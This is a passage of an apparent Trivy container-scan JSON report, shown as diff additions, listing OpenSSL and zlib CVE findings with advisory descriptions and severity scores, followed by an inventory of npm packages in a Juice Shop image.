"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/4f8d2bddaa2c8e06f9c33390ee1717059a6e4be6", + "https://github.com/openssl/openssl/commit/80c15faaf78042bbb8654a0e234c50c381732f74", + "https://github.com/openssl/openssl/commit/bd17511070fb39a67bfa19682affb765e706a974", + "https://github.com/openssl/openssl/commit/c332adaced43bcbb85f97410597e951c11ec3083", + "https://github.com/openssl/openssl/commit/d32350ae8ef7426718f5aa9e383d4b51398ee255", + "https://nvd.nist.gov/vuln/detail/CVE-2026-7383", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://ubuntu.com/security/notices/USN-8414-2", + "https://www.cve.org/CVERecord?id=CVE-2026-7383" + ], + "PublishedDate": "2026-06-09T17:17:50.337Z", + "LastModifiedDate": "2026-06-16T02:46:08.173Z" + }, + { + "VulnerabilityID": "CVE-2026-9076", + "VendorIDs": [ + "DSA-6335-1" + ], + "PkgID": "libssl3t64@3.5.5-1~deb13u2", + "PkgName": "libssl3t64", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64\u0026distro=debian-13.4", + "UID": "ac09dfa6dcc2ce61" + }, + "InstalledVersion": "3.5.5-1~deb13u2", + "FixedVersion": "3.5.6-1~deb13u2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:b73b1097e3a18c388a239e24aee83f0b69599a806a6cf62d08fa0f72e3240c28", + "DiffID": "sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7" + }, + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-9076", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:3f00ab7fa2b0d7b21fe6725b7e6b9a6afdc0c23bc252174737293fa88ae5e400", + "Title": "openssl: OpenSSL: Denial of Service due to heap out-of-bounds read in CMS password-based decryption", + "Description": "Issue summary: When CMS password-based decryption (RFC 3211 / PWRI key unwrap)\nprocesses attacker-supplied CMS data, an attacker-chosen stream-mode KEK\ncipher can trigger a heap out-of-bounds read in kek_unwrap_key().\n\nImpact summary: A heap buffer over-read may trigger a crash which leads to\nDenial of Service for an application if the input buffer ends at a memory\npage boundary and the following page is unmapped. There is no information\ndisclosure as the over-read bytes are not revealed to the attacker.\n\nThe key unwrapping function performs a check-byte test as specified in the\nRFC that reads 7 bytes from a heap allocation that is based on the wrapped\nkey length from the message. There is a minimum length check based on the\nblock length of the wrapping cipher. However the cipher is selected from\nan OID carried in the attacker's PWRI keyEncryptionAlgorithm with no\nrequirement that the cipher be a block cipher. When an attacker selects\na stream-mode cipher the guard will be ineffective and the allocated buffer\ncontaining the unwrapped key can be too small to fit the check-bytes\nspecified in the RFC and a buffer over-read can happen.\n\nApplications calling CMS_decrypt() or CMS_decrypt_set1_password()\n(equivalently openssl cms -decrypt -pwri_password ...) on untrusted CMS\ndata are vulnerable to this issue. No password knowledge is required: the\nover-read happens during the unwrap attempt before any authentication\nsucceeds.\n\nThe over-read is limited to a few bytes and is not written to output, so\nthere is no information disclosure. Triggering a crash requires the\nallocation to border unmapped memory, which is unlikely with the normal\nallocator.\n\nThe FIPS modules are not affected by this issue.", + "Severity": "LOW", + "CweIDs": [ + "CWE-125" + ], + "VendorSeverity": { + "alma": 3, + "photon": 3, + "redhat": 1, + "rocky": 3, + "ubuntu": 1 + }, + "CVSS": { + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:25237", + "https://access.redhat.com/security/cve/CVE-2026-9076", + "https://bugzilla.redhat.com/2481879", + "https://bugzilla.redhat.com/2481880", + "https://bugzilla.redhat.com/2481881", + "https://bugzilla.redhat.com/2481882", + "https://bugzilla.redhat.com/2481884", + "https://bugzilla.redhat.com/2481885", + "https://bugzilla.redhat.com/2481887", + "https://bugzilla.redhat.com/2481890", + "https://bugzilla.redhat.com/2481891", + "https://bugzilla.redhat.com/2481892", + "https://bugzilla.redhat.com/2481893", + "https://bugzilla.redhat.com/2481894", + "https://bugzilla.redhat.com/2481896", + "https://bugzilla.redhat.com/2481897", + "https://bugzilla.redhat.com/2481898", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481879", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481881", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481882", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481884", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481885", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481887", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481890", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481891", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481892", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481893", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481894", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481896", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481897", + "https://bugzilla.redhat.com/show_bug.cgi?id=2481898", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076", + "https://errata.almalinux.org/10/ALSA-2026-25237.html", + "https://errata.rockylinux.org/RLSA-2026:25237", + "https://github.com/openssl/openssl/commit/05b066366842f930fadd9a6e94df98030af431bb", + "https://github.com/openssl/openssl/commit/3d8d5bc1056b2f62da9fede23fedbf47e85187b0", + "https://github.com/openssl/openssl/commit/715349a1d7c6db970e6815dafb90915f07307f98", + "https://github.com/openssl/openssl/commit/77bf00ab13f6ff5e516535432f0328ed70ec0c26", + "https://github.com/openssl/openssl/commit/eecbe330977e8d023aae1ca2d9bdbe983ef3fdc6", + "https://nvd.nist.gov/vuln/detail/CVE-2026-9076", + "https://openssl-library.org/news/secadv/20260609.txt", + "https://ubuntu.com/security/notices/USN-8414-1", + "https://ubuntu.com/security/notices/USN-8414-2", + "https://www.cve.org/CVERecord?id=CVE-2026-9076" + ], + "PublishedDate": "2026-06-09T17:17:50.997Z", + "LastModifiedDate": "2026-06-16T02:45:58.157Z" + }, + { + "VulnerabilityID": "CVE-2026-27171", + "PkgID": "zlib1g@1:1.3.dfsg+really1.3.1-1+b1", + "PkgName": "zlib1g", + "PkgIdentifier": { + "PURL": "pkg:deb/debian/zlib1g@1.3.dfsg%2Breally1.3.1-1%2Bb1?arch=amd64\u0026distro=debian-13.4\u0026epoch=1", + "UID": "ee958543a42dbedd" + }, + "InstalledVersion": "1:1.3.dfsg+really1.3.1-1+b1", + "Status": "affected", + "Layer": { + "Digest": "sha256:cac2ae0193cb073e7492050b05fc342a888651b4bbc966908c8793f889c299ba", + "DiffID": "sha256:e4ba966d7f0527dfe0fcb559e4e18d4da42c4e6beae924719255e0dedb554ed0" + }, + "SeveritySource": "nvd", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27171", + "DataSource": { + "ID": "debian", + "Name": "Debian Security Tracker", + "URL": "https://salsa.debian.org/security-tracker-team/security-tracker" + }, + "Fingerprint": "sha256:d0c22cd136144de16ef455cc0f17db0a62262976cf9b5062b93d96ade654d1e0", + "Title": "zlib: zlib: Denial of Service via infinite loop in CRC32 combine functions", + "Description": "zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1284" + ], + "VendorSeverity": { + "amazon": 1, + "azure": 1, + "cbl-mariner": 1, + "julia": 1, + "nvd": 2, + "photon": 2, + "redhat": 1, + "ubuntu": 1 + }, + "CVSS": { + "julia": { + "V3Vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 2.9 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 3.3 + } + }, + "References": [ + "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit", + "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/", + "https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf", + "https://access.redhat.com/security/cve/CVE-2026-27171", + "https://github.com/advisories/GHSA-h858-mf2m-8jf4", + "https://github.com/madler/zlib/issues/904", + "https://github.com/madler/zlib/releases/tag/v1.3.2", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27171", + "https://ostif.org/zlib-audit-complete", + "https://ostif.org/zlib-audit-complete/", + "https://www.cve.org/CVERecord?id=CVE-2026-27171" + ], + "PublishedDate": "2026-02-18T04:16:01.263Z", + "LastModifiedDate": "2026-03-25T21:27:04.603Z" + } + ] + }, + { + "Target": "Node.js", + "Class": "lang-pkgs", + "Type": "node-pkg", + "Packages": [ + { + "ID": "1to2@1.0.0", + "Name": "1to2", + "Identifier": { + "PURL": "pkg:npm/1to2@1.0.0", + "UID": "10e6b30abbbb1635" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/nan/tools/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@adraffy/ens-normalize@1.10.1", + "Name": "@adraffy/ens-normalize", + "Identifier": { + "PURL": "pkg:npm/%40adraffy/ens-normalize@1.10.1", + "UID": "3721bd6c47da4d84" + }, + "Version": "1.10.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@adraffy/ens-normalize/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@ai-sdk/gateway@3.0.114", + "Name": "@ai-sdk/gateway", + "Identifier": { + "PURL": "pkg:npm/%40ai-sdk/gateway@3.0.114", + "UID": "f1809385188bd8e1" + }, + "Version": "3.0.114", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@ai-sdk/gateway/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@ai-sdk/openai-compatible@2.0.47", + "Name": "@ai-sdk/openai-compatible", + "Identifier": { + "PURL": "pkg:npm/%40ai-sdk/openai-compatible@2.0.47", + "UID": "4837a1f80eeab48d" + }, + "Version": "2.0.47", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@ai-sdk/openai-compatible/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@ai-sdk/provider@3.0.10", + "Name": "@ai-sdk/provider", + "Identifier": { + "PURL": "pkg:npm/%40ai-sdk/provider@3.0.10", + "UID": "e132c7cb57fc263f" + }, + "Version": "3.0.10", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@ai-sdk/provider/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@ai-sdk/provider-utils@4.0.27", + "Name": "@ai-sdk/provider-utils", + "Identifier": { + "PURL": "pkg:npm/%40ai-sdk/provider-utils@4.0.27", + "UID": "5a3fdc8912291de9" + }, + "Version": "4.0.27", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@ai-sdk/provider-utils/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@babel/helper-string-parser@7.27.1", + "Name": "@babel/helper-string-parser", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-string-parser@7.27.1", + "UID": "b3ceffd45ba46155" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@babel/helper-string-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@babel/helper-validator-identifier@7.28.5", + "Name": "@babel/helper-validator-identifier", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-validator-identifier@7.28.5", + "UID": "6d2715d51e30f831" + }, + "Version": "7.28.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@babel/helper-validator-identifier/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@babel/parser@7.29.3", + "Name": "@babel/parser", + "Identifier": { + "PURL": "pkg:npm/%40babel/parser@7.29.3", + "UID": "a525bd7874beaafb" + }, + "Version": "7.29.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@babel/parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@babel/types@7.29.0", + "Name": "@babel/types", + "Identifier": { + "PURL": "pkg:npm/%40babel/types@7.29.0", + "UID": "59aefc985d9d2ebf" + }, + "Version": "7.29.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@babel/types/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@colors/colors@1.6.0", + "Name": "@colors/colors", + "Identifier": { + "PURL": "pkg:npm/%40colors/colors@1.6.0", + "UID": "5062e6a164e38ede" + }, + "Version": "1.6.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/logform/node_modules/@colors/colors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@colors/colors@1.6.0", + "Name": "@colors/colors", + "Identifier": { + "PURL": "pkg:npm/%40colors/colors@1.6.0", + "UID": "41cc8b97412b712c" + }, + "Version": "1.6.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/winston/node_modules/@colors/colors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@dabh/diagnostics@2.0.8", + "Name": "@dabh/diagnostics", + "Identifier": { + "PURL": "pkg:npm/%40dabh/diagnostics@2.0.8", + "UID": "23208d004f23c407" + }, + "Version": "2.0.8", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@dabh/diagnostics/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@fontsource/roboto@5.2.10", + "Name": "@fontsource/roboto", + "Identifier": { + "PURL": "pkg:npm/%40fontsource/roboto@5.2.10", + "UID": "9cd61fa945825bbf" + }, + "Version": "5.2.10", + "Licenses": [ + "OFL-1.1" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@fontsource/roboto/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@gar/promisify@1.1.3", + "Name": "@gar/promisify", + "Identifier": { + "PURL": "pkg:npm/%40gar/promisify@1.1.3", + "UID": "106ce86fb5b31998" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@gar/promisify/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@isaacs/cliui@8.0.2", + "Name": "@isaacs/cliui", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/cliui@8.0.2", + "UID": "d34154109efd8df3" + }, + "Version": "8.0.2", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@isaacs/cliui/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@isaacs/fs-minipass@4.0.1", + "Name": "@isaacs/fs-minipass", + "Identifier": { + "PURL": "pkg:npm/%40isaacs/fs-minipass@4.0.1", + "UID": "8d08741905e4b1ce" + }, + "Version": "4.0.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@isaacs/fs-minipass/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@material/material-color-utilities@0.3.0", + "Name": "@material/material-color-utilities", + "Identifier": { + "PURL": "pkg:npm/%40material/material-color-utilities@0.3.0", + "UID": "568cb858abf628ed" + }, + "Version": "0.3.0", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@material/material-color-utilities/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@my-scope/package-a@0.0.0", + "Name": "@my-scope/package-a", + "Identifier": { + "PURL": "pkg:npm/%40my-scope/package-a@0.0.0", + "UID": "d4010a1a4561f6ab" + }, + "Version": "0.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/resolve/test/resolver/multirepo/packages/package-a/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@my-scope/package-b@0.0.0", + "Name": "@my-scope/package-b", + "Identifier": { + "PURL": "pkg:npm/%40my-scope/package-b@0.0.0", + "UID": "f9c5aaba94a26811" + }, + "Version": "0.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/resolve/test/resolver/multirepo/packages/package-b/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@noble/curves@1.2.0", + "Name": "@noble/curves", + "Identifier": { + "PURL": "pkg:npm/%40noble/curves@1.2.0", + "UID": "5ef4cbbd4cd1cef9" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@noble/curves/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@noble/hashes@1.3.2", + "Name": "@noble/hashes", + "Identifier": { + "PURL": "pkg:npm/%40noble/hashes@1.3.2", + "UID": "9329001d071f3eaf" + }, + "Version": "1.3.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@noble/hashes/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@noble/hashes@2.2.0", + "Name": "@noble/hashes", + "Identifier": { + "PURL": "pkg:npm/%40noble/hashes@2.2.0", + "UID": "629a9a3371437ebe" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@otplib/plugin-crypto-noble/node_modules/@noble/hashes/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@npmcli/agent@3.0.0", + "Name": "@npmcli/agent", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/agent@3.0.0", + "UID": "b8a73e2498fe8690" + }, + "Version": "3.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@npmcli/agent/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@npmcli/fs@1.1.1", + "Name": "@npmcli/fs", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/fs@1.1.1", + "UID": "d22ac26dd8859fd5" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/@npmcli/fs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@npmcli/fs@4.0.0", + "Name": "@npmcli/fs", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/fs@4.0.0", + "UID": "a09e49b4df6b907d" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@npmcli/fs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@npmcli/move-file@1.1.2", + "Name": "@npmcli/move-file", + "Identifier": { + "PURL": "pkg:npm/%40npmcli/move-file@1.1.2", + "UID": "ef7732c7a1e0078e" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@npmcli/move-file/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@opentelemetry/api@1.9.1", + "Name": "@opentelemetry/api", + "Identifier": { + "PURL": "pkg:npm/%40opentelemetry/api@1.9.1", + "UID": "1e66297ee9ccea75" + }, + "Version": "1.9.1", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@opentelemetry/api/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@otplib/core@13.4.0", + "Name": "@otplib/core", + "Identifier": { + "PURL": "pkg:npm/%40otplib/core@13.4.0", + "UID": "71b69b903ced03bd" + }, + "Version": "13.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@otplib/core/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@otplib/hotp@13.4.0", + "Name": "@otplib/hotp", + "Identifier": { + "PURL": "pkg:npm/%40otplib/hotp@13.4.0", + "UID": "689f3be73d65c034" + }, + "Version": "13.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@otplib/hotp/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "@otplib/plugin-base32-scure@13.4.0", + "Name": "@otplib/plugin-base32-scure", + "Identifier": { + "PURL": "pkg:npm/%40otplib/plugin-base32-scure@13.4.0", + "UID": 